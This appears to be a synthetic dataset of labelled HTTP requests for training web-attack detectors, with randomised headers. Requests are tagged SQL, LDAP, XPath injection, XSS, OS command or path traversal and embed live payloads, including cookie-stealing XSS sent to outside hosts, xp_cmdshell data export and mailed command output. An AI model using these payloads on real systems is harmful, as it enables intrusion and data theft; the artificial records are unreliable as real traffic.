Cache-Control: min-fresh=22690
Client-ip: 36.211.14.62
Cookie: krolnRaamatht=6;wLyst=9732350;nplie3t2eel=roeho
Cookie2: $Version="306"
Date: Sun, 16 Dec 07 15:29:14 GMT
ETag: "h9OlCFyb@HUr6enBM"
Expect: e87y4=Iztt;eiaz=serwoe
From: Odth@g78cnm.uk
If-Modified-Since: Thu, 02 Aug 07 16:28:04 GMT
If-Unmodified-Since: Fri, 25 Jan 08 13:13:46 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 29 Oct 06 01:39:39 CET
Max-Forwards: 6
MIME-Version: 4.4
Pragma: t1=pnthant
Proxy-Authorization: Digest uri=/abtstebu/h4felsd/o370lht/etxsert/rdgGE.asp
Authorization: Basic ZWVyM0U6cmF0dXNl
Range: -80151
Referer: http://k14klO0z.it/encladt/d8hiiin.swf
TE: trailers,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/8.7 (Machintosh; U; PPC 5.2; de-em; rv:5.4.4) Gecko/37864338
UA-CPU: 68000
UA-Disp: 1503,1276,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 383x105
Via: 0.1 225.142.131.138
Transfer-Encoding: enoem
Upgrade: nbUlro/5.5, yfi/5.9, islxmt/9.6, tmL/9.7
Warning: 473 www.sStrCzh.js "hicttlor5tflF" 
X-Forwarded-For: 173.145.188.232
X-Serial-Number: 3809752703652
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43234
Start - Id: 38391
class: LdapInjection
GET /gcastryngietlaEnfsim/wycc/9-2L.4WeW/Hbody2jUGa@/4mxnsonkaIrevknjhts/dOolsnoetdedhthsreph/fb/YOK8xmlGV@BNIa/lti3uoaQ1Yndy/htaccesiMALZV.jsp?oweanid=dawHrtlem1rrh&Txag3=ewLkrO&NethiyYny=734&-HXLIquhwD=faeesb69S&aienstrlsobg7=4boaotanerham&l3OHH4poB=11454858&wehdaGieaeWt=todaI+%28q+&cyeS1dh=089630&inviZhnjljeenhh=%29++%28+%7C+++%28+++cn%3D*o++++%27brien*++++%29%28mail%3D*o+%27brien*+%29++&8a2sn=%3Ei%3Fc&iaztrc6nbTesmo5=h%3Fetve&nA9eoWso0S1apd=a&sy=03&uttbel6ot=eejlaue7C7&F1prlWy=ct8 HTTP/1.1
Host: www.cEua.be
Connection: i90n6n
Accept: */*;q=0.1
Accept-Charset: euc-kr;q=0.3, x-mac-turkish;q=0.0, x-mac-chinesesimp, iso-8859-8-i, iso-2022-kr
Accept-Encoding: compress;q=0.5, deflate;q=0.4
Accept-Language: *
Cache-Control: max-stale
Client-ip: 198.17.15.97
Cookie: ht8alh=76017742;ci5rtttiRdss=f
Cookie2: $Version="08"
Date: Fri, 22 Jun 07 22:14:07 GMT
ETag: W/"yNFl3unHM9j-nY_lvkD"
Expect: oWq0o=iRcIeee
From: e3ig@cUsnasr.com
If-Modified-Since: Thu, 29 Sep 05 01:44:50 GMT
If-Unmodified-Since: Sun, 25 Jul 04 08:39:03 CET
If-Match: "q0ZFq7q@ZSa2QEn7AtP"
If-None-Match: *
If-Range: Thu, 14 Jan 10 16:11:26 UTC
Max-Forwards: 0
MIME-Version: 5.2
Pragma: tc90ZoiY=aiUncnum
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: 4sexi cs9e=nrrbsKhu
Range: 25855-2071
Referer: http://www.0dsn.uk/gyyh/tEeuwO2t.zip
TE: chunked;q=0.2,trailers,chunked;q=0.4
Trailer: If-Range
User-Agent: Mozilla/8.0 (Machintosh; U; PPC 2.6; oo-ah; rv:4.0.9) Gecko/67188286
UA-CPU: Sparc
UA-Disp: 6597,6108,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 6780x4829
Via: FTP/1.6 160.150.147.193, 0.3 40.189.67.2
Transfer-Encoding: gzip
Upgrade: oHser/7.1, outinw/4.0, weeBc/8.7, ngy3/2.0, rTe/9.3
Warning: 055 37.109.157.36 "ihrzacs63o6dhnu3" "Fri, 03 Jun 05 11:23:10 GMT"
X-Forwarded-For: 114.188.50.157
X-Serial-Number: 85165873223938
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38391
Start - Id: 35722
class: XPathInjection
GET /aD1cnM3qjtttgssu/a8SvF1ZeD/.vNMwherec8nT3IologZm/nDezwobH1L_iUQXGe/6seshEim/rccmqnsS8xmsgtha/aHQ1/u8IGH/8tzgzoJz-Hp@L7msB/includez/DzFb_m/7JBwgetvHFb.php3?iasned0epse=dn+unionie6Unetcat+%40%40&neesl9v=tosleExu&amnOs8=adz&kmA8H0AK1tu=pxji9s3Nhtm&wjiw=tsttvg&r-eKZc5Vs=9024&iu=2&Woae=cfnie+saunioniwa%2Fru&bi=%3D%5Da&aulU=837719292&lRatasxntac=0691&LsystemrG=726769&urtaDm5rogri=rqet%7E&echi=39740574&inin=162+++or+++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D+++%7C+path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++++or++010%3D HTTP/1.1
Host: www.tnlfC.uk
Connection: close
Accept: application/*;q=0.1, audio/*, video/quicktime;q=0.0
Accept-Charset: *;q=0.0
Accept-Encoding: *;q=0.7
Accept-Language: *;q=0.8
Cache-Control: no-transform
Client-ip: 18.203.213.243
Cookie: suctdehsisY=9o= 
Cookie2: $Version="10"
Date: Sat, 02 Aug 08 22:04:51 GMT
ETag: "qY1F1gA6Xdx_fn-fmH4"
Expect: ois81Er
From: nptt@ai166.st
If-Modified-Since: Wed, 08 Apr 09 03:58:16 UTC
If-Unmodified-Since: Fri, 07 Sep 07 23:03:54 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 18 Sep 09 01:06:22 CET
Max-Forwards: 89
MIME-Version: 6.7
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM M2VhcnhuSGFsNG83MHNvY2lpYXdhemxwT2VzcnJkbGNuc2dhaWxzbmU=
Range: -0128,0-7163
Referer: http://ande.de/SnrtHee/0thy/hbim.jpeg
TE: gzip,gzip
Trailer: TE
User-Agent: Mozilla/3.5 (X11; U; Open BSD i586 6.4; u6-oh; rv:5.3.0) Gecko/76731538
UA-CPU: Sparc
UA-Disp: 453,3007,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 161x6887
Via: 5.3 www.Sw2steew.htm, FTP/1.8 www.seft.gif
Transfer-Encoding: compress
Upgrade: d3ec/2.6, tifat/9.6
Warning: 550 www.hfiueaes.shtml "mhtjtnssennQ8" "Fri, 14 Nov 08 07:02:27 UTC"
X-Forwarded-For: 171.203.103.227
X-Serial-Number: 727389738621693748
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35722
Start - Id: 47252
class: XSS
GET /2VKaxBunion9YA/tkF7wXxjx@_4QyF9_g4/RNt/rQM6LgH/Uexecsock_streamP0pwallE_MQ/86CmQKH9/pVPgrSINCr_HHtnISoQ/otmclbtcr.jsp?4kbinSXLA=aeqgoqeuceI5el&soc7l4=6t%7Em&tfinuhmlia=aand%40woE&2sdnjsu=g9cSei%5Dhw1A3ToM&wa=2326130899&oeewscsDha6eO=tal+%24emzor&yttdmt=ofre&4NpmEcaS=2%3Fml%25Q+non7%3C+object+nb&Iaode=085308182&2tc=oAYfsf4knb&bos=9&ZrDOoqGgpsThomercp=%3Cimg+src%3D+++%22+ntnadetast+%22onmouseover+%3D++%22+++++%5Bdocument.location.replace%28%27http%3A%2F%2Fwww.vematrit.com%2Fcgi-bin%2Fmeiltege.cgi%27%2Bdocument.cookie%29%3B%5D++++%22++%3E&uDotcgpdLxTls=vbscriptfS+q+eonchg%3C&a5oePAlt11gjwi=brsWse%40rev%263trcpei+slk HTTP/1.1
Host: 53.97.139.159
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: windows-1258;q=0.8, x-mac-roman;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: no-cache
Client-ip: 109.181.161.233
Cookie: e18gatNi6egnat=feaa7eseei;htNoOne=;xssou%deacande=He7;ieaHoehi8j6o=Tflikex&lDD$'wnyr
Cookie2: $Version="62"
Date: Tue, 27 Jan 09 20:30:23 CET
ETag: "Kr5xQV4a.H1DhBu"
Expect: 100-continue
From: mP8eatM@krgt.fr
If-Modified-Since: Tue, 11 May 04 04:26:21 UTC
If-Unmodified-Since: Tue, 26 Jan 10 12:40:54 CET
If-Match: "he4K17EDeW3mllKWCm"
If-None-Match: *
If-Range: "p3.BQaZCl7N6PhYI"
Max-Forwards: 473
MIME-Version: 3.6
Pragma: ea82e=obwls20m
Proxy-Authorization: 6ndit medexEq=belmLsj
Authorization: NTLM dFVvbjNjc2Voc29zb2lORWVyWTAzMGZvd2xpaTU4ZXN0Y2VudGh3YXRhb3M=
Range: -88
Referer: /m7H3ihe/1rvnnba/pzf4Ae/aooOr/sexAn.mdb
TE: gzip;q=0.5,deflate,deflate
Trailer: Warning
User-Agent: Mozilla/3.4 (Windows; U; Win98 8.7; et-m5; rv:3.4.5) Gecko/13193431
UA-CPU: StrongARM
UA-Disp: 390,072,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 077x3740
Via: 8.8 124.244.194.141
Transfer-Encoding: compress
Upgrade: ebpgud/5.5, uo6ys/3.0, eeei/3.0, wOU/7.9
Warning: 231 178.152.9.49 "iem9a" "Sat, 05 Jul 08 14:59:50 GMT"
X-Forwarded-For: 29.33.63.135
X-Serial-Number: 15152704800
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47252
Start - Id: 48087
class: XSS
GET /Pep/WatitysyeeNeIidBhrr/rhRr1etncsmneaei/130AbeCQVLcrJAr/nPmyhAkjzRwSs1L/enmh/nmwdLg/dSj/rmondehetnhaSces.css?nC=%3Cimg++src+++%3D++++%22+javascript%3A%5Bdocument.location.replace+++%28%27http%3A%2F%2Fwww.roesntns.com%2Fcgi-bin%2Fasstde.cgi%27%2Bdocument.cookie%29%3B%5D+++++%22++++%3E&fTtmT3e8ini=+I&ibeeeenih=phpziowAwindow.openedsfh&o0e7Ni=nnyVdT&rT0wolosyo=2npexec&tIomnuwFyT0te=objecteis%26-fsbt+%7Cstcopy+a&eeicwei8wan=raihunion&ttfdai0afshitsr=3 HTTP/1.1
Host: 90.123.136.178
Connection: keep-alive
Accept: application/*;q=0.3
Accept-Charset: *
Accept-Encoding: compress, identity;q=0.8, gzip, compress
Accept-Language: *;q=0.9
Cache-Control: no-transform
Client-ip: 220.26.106.26
Cookie: m0=1s ;V1wDS=sAeooszs;oleoersnra=wnqo5s3lu
Cookie2: $Version="02"
Date: Sat, 08 Jul 06 20:05:07 UTC
ETag: W/"_NrJQAFWBD.1Ued@q5"
Expect: 100-continue
From: pr43lq@7remye.cz
If-Modified-Since: Sat, 20 Mar 04 24:54:44 GMT
If-Unmodified-Since: Sat, 07 Jul 07 10:37:52 CET
If-Match: *
If-None-Match: "@d9wbSsMxN.ayvo"
If-Range: "pycaZVLhg9JCVweRmNW"
Max-Forwards: 832
MIME-Version: 2.8
Pragma: 8eei8s=PEcrap
Proxy-Authorization: Basic bGVpbnJsaTpvb2lDbA==
Authorization: Rucfn yksNds=e8tWg
Range: -179295,540225-63
Referer: /imuqeo/7uwdl/dax3st/stoeAhva.exe
TE: trailers
Trailer: Max-Forwards
User-Agent: az9u.vcZ http://www.tsai.uk
UA-CPU: PowerPC
UA-Disp: 367,260,16
UA-OS: WinNT
UA-Pixels: 6001x2247
Via: HTTP/0.9 97.240.1.246, 0.6 67.131.86.140, njhoOo/4.4 173.241.197.147:504
Transfer-Encoding: compress
Upgrade: latA/6.2, lyernh/8.8, vU0s/9.0, esnis/7.5
Warning: 756 5.66.220.204:50966 "enwFsoiiennyllH" "Thu, 05 Jul 07 19:51:43 CET"
X-Forwarded-For: 69.186.228.89
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48087
Start - Id: 43379
class: OsCommanding
GET /euswalllrulXiraa4n/6oiBcNyCntM/tk18FZ2F/dsrsIeueb8ton9ee/l19ftrkaFmqY/bGTewindow.openPorzl.exe?edblseEetlmoFr=aV-tBnnwPDP&iyiporTt=gSaet%29z&eTg@99J=jre&oaJalike.Z=015&gtgcshdwotexad=3&dXW7ouZ=m2T2qi8knQb&rcpwindow.openy7Ub=n3Luw0c6t&kIEywzrKF3XT=rvvnasgLaa&ln0=n&eco=3bep2lhe&AkTahillnDIefeL=8&8bre9=%27+%3Bcat+++%2Ftmp%2Fres+++mail++totret%40rell.com++++%3B HTTP/1.1
Host: www.fsrccUsns.gov
Connection: close
Accept: */*;q=0.6
Accept-Charset: iso-10646-ucs-2
Accept-Encoding: *;q=0.1
Accept-Language: *
Cache-Control: max-age=95040
Client-ip: 218.45.110.121
Cookie: @B1OFPmeHDH=2;coA4sEtfnsorlr=itnmetant(<;witqb
Cookie2: $Version="54"
Date: Fri, 16 Jun 06 17:08:20 CET
ETag: W/"094MHSgefeJK4Vl5"
Expect: railv
From: no4b@rasantepan.ch
If-Modified-Since: Tue, 23 Mar 04 23:26:26 CET
If-Unmodified-Since: Wed, 11 Jun 08 23:05:48 UTC
If-Match: "5fo-Bx0kQ@V316g-SUkK"
If-None-Match: *
If-Range: Mon, 24 Mar 08 15:48:53 UTC
Max-Forwards: 7
MIME-Version: 2.7
Pragma: jntdishi=r
Proxy-Authorization: Digest uri=http://www.aSgm.net/onpfm.pdf
Authorization: stt7m heees=nnhm3bi
Range: -746384,775-
Referer: /tea4geab/vI7elaT/aduon9/rtm3e/ythpfa.php3
TE: trailers
Trailer: Upgrade
User-Agent: 57pBi/0.1
UA-CPU: PowerPC
UA-Disp: 5052,410,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 9788x122
Via: 8.3 www.b2ltr5eo.shtml, 2.8 236.132.67.73, 8tV/8.8 www.st6ooNea.jpg
Transfer-Encoding: deflate
Upgrade: deO8tz/7.8, eelw/3.5
Warning: 760 153.140.23.116 "tasreEom4" "Mon, 12 Apr 10 01:21:27 GMT"
X-Forwarded-For: 17.138.146.187
X-Serial-Number: 68319129
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43379
Start - Id: 36162
class: PathTransversal
GET /rOpdFwttqeotu/egn/nOB/i.qC0p.D@a/c-yL9D/fwn8nlatjn3fmysl/upJ.php?itlc1PinoaTcer=gKvvvw&bFRJnetcat56_PO=t%3A%5Cwindows%5Cboot.ini&apEs71sClnbed=eH%40sa&gl=htns%3B%3A3hodn0oaa&tng=2&l-Altr6=ch9&2e0iee5I=Aotne&gdnste02mAfe=zn+eheo&nut=tiiospasswdfLzrue&qoinObpr=eu5plhvasotithe&a00wradI=kOdSs&ny12oe=pe3tmp%5D2eHtoOsamrRpasswd&vbbe=io+e HTTP/1.1
Host: www.ptadlo.de
Connection: keep-alive
Accept: video/*, application/rtf, application/zip
Accept-Charset: windows-1251;q=0.9
Accept-Encoding: compress, compress, compress;q=0.9, gzip;q=0.5, compress
Accept-Language: *;q=0.5
Cache-Control: no-transform
Cookie: wTetd=execs06s
Date: Fri, 13 May 05 16:34:26 GMT
ETag: W/"Ur6v1GbQqi5Fpv3B_GUc"
Expect: 100-continue
From: esie@ntoatbni.fr
If-Modified-Since: Sat, 12 Jul 08 22:42:23 UTC
If-Unmodified-Since: Wed, 12 Jul 06 01:36:17 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 01 Apr 09 08:03:01 CET
Max-Forwards: 6
Pragma: teteoR7b='ieeRBnn'
Proxy-Authorization: Digest nonce
Authorization: Basic aW1xMGc6ZkFtZWVwb3o=
Range: 883-12,6163-,33622-
Referer: http://www.hUntA.fr/tiohia.wav
TE: gzip;q=0.4
Trailer: Accept-Encoding
User-Agent: olen3 (eALAAGh; dzX35nv)
UA-Disp: 4206,422,32
UA-Color: color32
UA-Pixels: 5546x388
Via: 7.8 27.46.195.168, 8.8 10.97.140.165, 1.0 127.166.226.111
Transfer-Encoding: I6tq; evoJodre=iodNi0
Warning: 176 103.233.4.139 "gothscr7a4n" 
X-Forwarded-For: 42.90.242.122
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36162
Start - Id: 35040
class: SqlInjection
GET /PlKM@positionh-pInF/cTkwhORniceij/wnbctx2cyyb/sW7rd4/tc8st9f/yspuihlI/11_I0/yAdeeersnsu3lrcrws/0azBpST/4ihc2RM8xF6R/y0G.pAO@/lh7kzSoWwmrLEg.7..jpeg?tnan=nneloe9vy&zOj=992&nlUdalcaerltei=393&divrpasswdpc=fsock_stream%27a%3Eorp&bahoebhCvhlhe=exec++++xp_cmdshell+%27%22rmiAlEaos%22++++%3E%3E+++++script.vbs%27&ud=W+fafdne0e HTTP/1.0
Host: www.jatgaraie.st
Connection: keep-alive
Accept: text/*
Accept-Charset: x-mac-japanese;q=0.1, iso-8859-15;q=0.2, big5;q=0.6, iso-8859-9
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: only-if-cached
Client-ip: 70.74.68.114
Cookie: etn6p=60445236;chs=|0;atpagdeoq=aaow;ianogoi=fuR'IgwseletCney\y;rnEerbsrntrnP=IeRthinh l?Tioo;i9eCdcs9asnncae=oo| 
Date: Wed, 01 Feb 06 23:10:58 GMT
ETag: W/"0@NBRWxhqqgere4xA"
Expect: 100-continue
If-Modified-Since: Thu, 10 Aug 06 08:43:56 GMT
If-Unmodified-Since: Fri, 09 Mar 07 14:39:09 UTC
If-Match: "8Zn6mowOzKX6RPdh4VTh"
If-None-Match: *
If-Range: *
Max-Forwards: 20
MIME-Version: 1.5
Pragma: 9a=eeie4
Authorization: Digest uri=/iy6hgdio.css
Range: 032643-
Referer: http://www.Rhhgsysr.it/Pgoda/yedkd/etioaa.mp3
TE: trailers
User-Agent: tceirnr (yMYOGnL-; sduHioPTu; 1tSffpLOoL; eU2VeAvfa; r2vnE43g)
UA-CPU: PowerPC
UA-Color: color8
Via: 6.4 www.nacffhNz.htm:6
Transfer-Encoding: bn6tsc; Eieotn0k=oxswj
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35040
Start - Id: 36930
class: LdapInjection
POST /o8aR5cq7Wd/wDAdvAIQ0iKGk/uGM7Jlu7z/yenenstcmdptaltatlc/oaoe/UkOehoRaomi69ie/njBCUtJhn/j0LOARbF4/hhnWH/orStwhOrSype/nilt/eSIT5.asmx? HTTP/1.0
Content-Length: 135
Content-Language: s,o,ocLf
Content-Encoding: identity
Content-Location: http://www.vriTodtp.cz/etebRao5/raEoysa/A5nod/ilHFqc.zip
Content-MD5: eW51ZWJ2ZW5yb3M1Nmxvcw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 19 Apr 05 04:41:19 UTC
Last-Modified: Mon, 06 Sep 04 09:27:29 GMT
Host: www.dsDIceotCm.net
Connection: keep-alive
Accept: text/*;q=0.1
Accept-Charset: cp-932;q=0.4, windows-1250;q=0.7, iso-8859-9;q=0.8
Accept-Encoding: gzip, gzip, deflate;q=0.9
Accept-Language: *
Cache-Control: min-fresh=68
Client-ip: 162.232.160.26
Cookie: ny=ebrNvdatO;deleteXtpucbgsoundTWELj=tHdmexecthpnntsi|6eehtpass;Ta=daetmoedt9ioukqdio;4hlq=dFp0MzMSmTv@;RB@XJfrom=onrcps;JBeSQA@pRS=594399
Cookie2: $Version="3"
Date: Sun, 11 Jul 04 21:35:51 UTC
ETag: "RZdC@lsq9GUwPpK44b"
Expect: 100-continue
From: nareu4te@pple4n.it
If-Modified-Since: Mon, 09 Jul 07 10:41:30 GMT
If-Unmodified-Since: Wed, 02 Dec 09 07:55:38 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 26 Feb 07 13:33:24 UTC
Max-Forwards: 23
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: Basic NG9lYWFkZTM6b25zZXhzdGM=
Authorization: Basic c2lubGg6ZTh6eWU=
Range: -312
Referer: http://Nudnn.be/pwsiina/ytrbtoor.exe
TE: deflate;q=0.5,gzip;q=0.1
Trailer: Accept
User-Agent: Mozilla/9.7 (compatible; MSIE 5.8; Windows NT; vpui; owran9le; mieeBd5soj)
UA-CPU: Sparc
UA-Disp: 0609,6015,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 015x0585
Via: 8.7 133.129.254.83, 8.7 225.162.81.219, FTP/0.8 www.Tai5ed0.htm
Transfer-Encoding: anaeip; aruqea=n4he0rf9
Upgrade: ejsf/1.7, lxAe/6.8, 3Tuete/5.0
Warning: 200 169.156.209.196:92 "0oiSeraRieyyto" "Thu, 26 Aug 04 15:57:50 UTC"
X-Forwarded-For: 189.182.231.41
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

vahV=leibnu&EmXL0=3959)(&(objectClass=iFei)(|(sn =    yroe)(cn=soyi    J*))&rlTO4kl=2g2QEQ3G&eG9onc4e=eeo

End - Id: 36930
Start - Id: 41292
class: SqlInjection
GET /ymaezthcio8athndqtoe.cgi?USM25rmtO=hv&gcuRSioeuhaagep=hbBD&gr2nrm=+%3E%276hm%2Firdd&ts=2te&jutst8aacz=09&oa9xae=wril&pa=%24a&oxiebhI=es HTTP/1.0
Host: www.henioIo2.gov
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-roman;q=0.7, x-mac-icelandic, iso-8859-9;q=0.1, x-mac-japanese;q=0.0
Accept-Encoding: gzip, gzip, gzip;q=0.0, gzip;q=0.5, deflate
Accept-Language: *
Cache-Control: no-store
Client-ip: 125.181.96.245
Cookie: flep8ltEneol=225;.NntLg=Iatzqk<;timsWm=' )    UNION    ALL    SELECT   he7tWns   ,     Sak70Ig   ,    bsrrs     FROM bsnten7lh WHERE  p9  NOT    IN   ('apehtmwEic'   ) AND     tny     NOT     IN   (  '0yals'    ) AND    ''=   ';t2nmr5W7mhw=boee;hr0hhncowst=znXFU3tNSV;ir0zri2rr=aiV_y
Cookie2: $Version="7"
Date: Thu, 05 Feb 09 06:56:20 UTC
ETag: W/"g_lFTiKjT0lFJ077"
Expect: nrtl=nlejage;ovtlr3u
From: q5mitc@si2ecNlvy.uk
If-Modified-Since: Wed, 26 Oct 05 10:27:47 UTC
If-Unmodified-Since: Sun, 10 May 09 04:06:52 UTC
If-Match: "MoILtabDkTt2nX@QIqZ."
If-None-Match: *
If-Range: *
Max-Forwards: 0690
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: Digest cnonce="ifbj"
Authorization: ge8k sztt=to0c3
Range: 9-769078
Referer: http://uiMn0v.fr/ikrow/sd86/l1NnE/ersaIi/aphhA.tar
TE: trailers
Trailer: Trailer
User-Agent: rrjnef (l1zBT36)
UA-CPU: x86
UA-Disp: 8432,789,8
UA-OS: Win95
UA-Color: color8
Via: FTP/7.7 79.113.4.235
Transfer-Encoding: compress
Upgrade: 1aa8/1.9, huin/7.7, ykium/1.0
Warning: 540 4.59.66.37 "ldiyu46vmehap" "Tue, 26 Feb 08 07:23:38 GMT"
X-Forwarded-For: 90.26.199.114
X-Serial-Number: 672862
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41292
Start - Id: 45926
class: PathTransversal
GET /rBy0QfIv@YCVK9EO/Nzk/2I8K.1C/0GzScY-GTT.g5GLNYTfZ/Of5ibduoneiliorlwiB/6Eis/imtay.jpeg?ifaatslnvoi=111&eOp7orIpendp=md2r3qe7mxmlrdg2&eei=fwindow.openetmbOfsu&zjssre0c=%3Enodei%3CutidexfeusrwediR&3TNxperlS=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWINDOWS%2Fautoexec.bat&jmdbteh=+Ketb HTTP/1.1
Host: 10.128.36.183
Connection: keep-alive
Accept: audio/*, audio/basic
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: max-stale=2173
Client-ip: 118.175.221.245
Cookie: 9hWSnlwtaiei=meNhmvgke0h;9gLstdin0=3116230
Cookie2: $Version="3"
Date: Sat, 18 Jul 09 07:14:59 UTC
ETag: "1MT.AVtNT_x-4Gm"
Expect: 100-continue
From: leat@aeegln9ow.cz
If-Modified-Since: Mon, 30 Nov 09 19:19:36 CET
If-Unmodified-Since: Thu, 08 Nov 07 14:43:46 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 4
MIME-Version: 7.1
Pragma: no-cache
Proxy-Authorization: NTLM aGFhMWFwaHJtTmx0ckVuOGlpZWRucmFnZXMyTG0wM3QxRQ==
Authorization: Basic b2Flb3JiOkRnZGE5bg==
Range: 434-766527,-7
Referer: /Sij1n/dise/lhed/etevt/qe6yohlg.pl
TE: chunked;q=0.6,deflate;q=0.8
Trailer: Upgrade
User-Agent: avRKLSuX http://www.0noco.biz
UA-CPU: 68000
UA-Disp: 1794,840,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 880x5284
Via: 7.9 65.143.242.95
Transfer-Encoding: deflate
Upgrade: dhvol/0.8, Pde/4.9
Warning: 025 97.241.122.220:45 "riSehsrtuatehr" 
X-Forwarded-For: 210.181.84.191
X-Serial-Number: 715330032292
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45926
Start - Id: 41050
class: SqlInjection
GET /hzhaeotel6t/sx/iiSgeuwIvagujtip/wp4geinioc/g@v/4%uBHlc/eyendatmwhe/ddChtbhYO8TUrlCJA/nAR5XQ61_ShJp.jpeg?eceh9oE1hitl6E=v%3Ae&hPsisebrno=r54IbaaV&Hn=63&e9oietsamg8=6984371&5EhecyfaEn=exec++++xp_cmdshell+++%27bcp++%22select++*+++from++++aayOi%22+queryout++pwdump.exe+++++-c++++-Craw++-Shackersip+++++-Usa++-Ph8ck3r%27&tnisrm=documentoakni9t1%40fecgav HTTP/1.1
Host: www.gop437eo.com
Connection: close
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: min-fresh=527
Client-ip: 228.4.149.91
Cookie: Aconnectd9a=2oon;ldsirLsoz=andai
Cookie2: $Version="386"
Date: Tue, 27 May 08 06:20:40 GMT
ETag: W/"8ZFZf9yc-djNYPGhy8y"
Expect: 100-continue
From: 4a4Ax80@ieieio.ch
If-Modified-Since: Sun, 07 Feb 10 17:03:43 UTC
If-Unmodified-Since: Tue, 07 Nov 06 15:30:30 UTC
If-Match: "4NWRnqIauxuK56ERj"
If-None-Match: *
If-Range: Fri, 01 Jan 10 24:42:53 GMT
Max-Forwards: 435
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: Digest cnonce="jpdruSsi"
Authorization: Digest algorithm=MD5
Range: 7-04,570-
Referer: /mseryn/fsoa8g/guhet/ttrirq.png
TE: trailers
User-Agent: Mozilla/2.9 (X11; U; Linux i586 7.9; sb-of; rv:9.5.8) Gecko/34680889
UA-CPU: PowerPC
UA-Disp: 439,0025,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 967x915
Via: 9.1 www.edFayer.gif, 4.2 171.159.146.43:254
Transfer-Encoding: compress
Upgrade: noqd/4.9, eti/6.4, 0arte/8.9
Warning: 428 www.ndOerieL.jpeg:9 "btsgnnnhoeooes5ArHa7" 
X-Forwarded-For: 57.95.233.202
X-Serial-Number: 54708069609443708
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41050
Start - Id: 35138
class: SqlInjection
PUT /iwtriiasqRHai/cuo5afHrr1nssba/irbgx2v/tBKuTR6Yz/Tie0sabo939btas/zn/yj-execHc0@gUb.sh? HTTP/1.0
Content-Length: 265
Content-Language: gyhE,ye
Content-Encoding: deflate
Content-Location: http://www.eo1rad.cz/di7b4eg/cdcnzvew/0rayyo.mp3
Content-MD5: aWdvYWVuRW5iY25pV3RmaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 20 Apr 08 09:06:50 UTC
Last-Modified: Sun, 21 Mar 10 08:51:33 CET
Host: 162.96.171.17
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-chinesesimp, iso-2022-jp, iso-8859-8, iso-8859-4;q=0.2, euc-kr
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: only-if-cached
Client-ip: 80.97.152.196
Cookie: hChhqlwnfoeir2=ul;sJy=elnucoounionmoala;osnuneaR=et;8iws2r=cmdi;msAhroaysesot=toleiee
Cookie2: $Version="87"
Date: Sat, 17 Feb 07 23:24:10 CET
ETag: W/"98S_zUCS1aSpT_Sf"
Expect: eel5Noee
From: mbaudh4h@tcta.net
If-Modified-Since: Fri, 15 May 09 20:02:00 CET
If-Unmodified-Since: Mon, 12 Dec 05 09:48:43 UTC
If-Match: "36@whpe5_bc2ZOx"
If-None-Match: "4.WO_PshxG7KBKr"
If-Range: Wed, 07 Jun 06 22:38:53 GMT
Max-Forwards: 239
MIME-Version: 5.3
Pragma: n1c9seu=tlnutttx
Proxy-Authorization: Digest username="e7tedn"
Authorization: Digest opaque="feure"
Range: 9644-,893-04607,798896-
Referer: /iaicou/06ehwe/yviaeTws/o45tru/Doot36cA.bin
TE: trailers,deflate
User-Agent: vlntoedsnlRurn
UA-Disp: 3713,1872,32
UA-OS: Windows NT
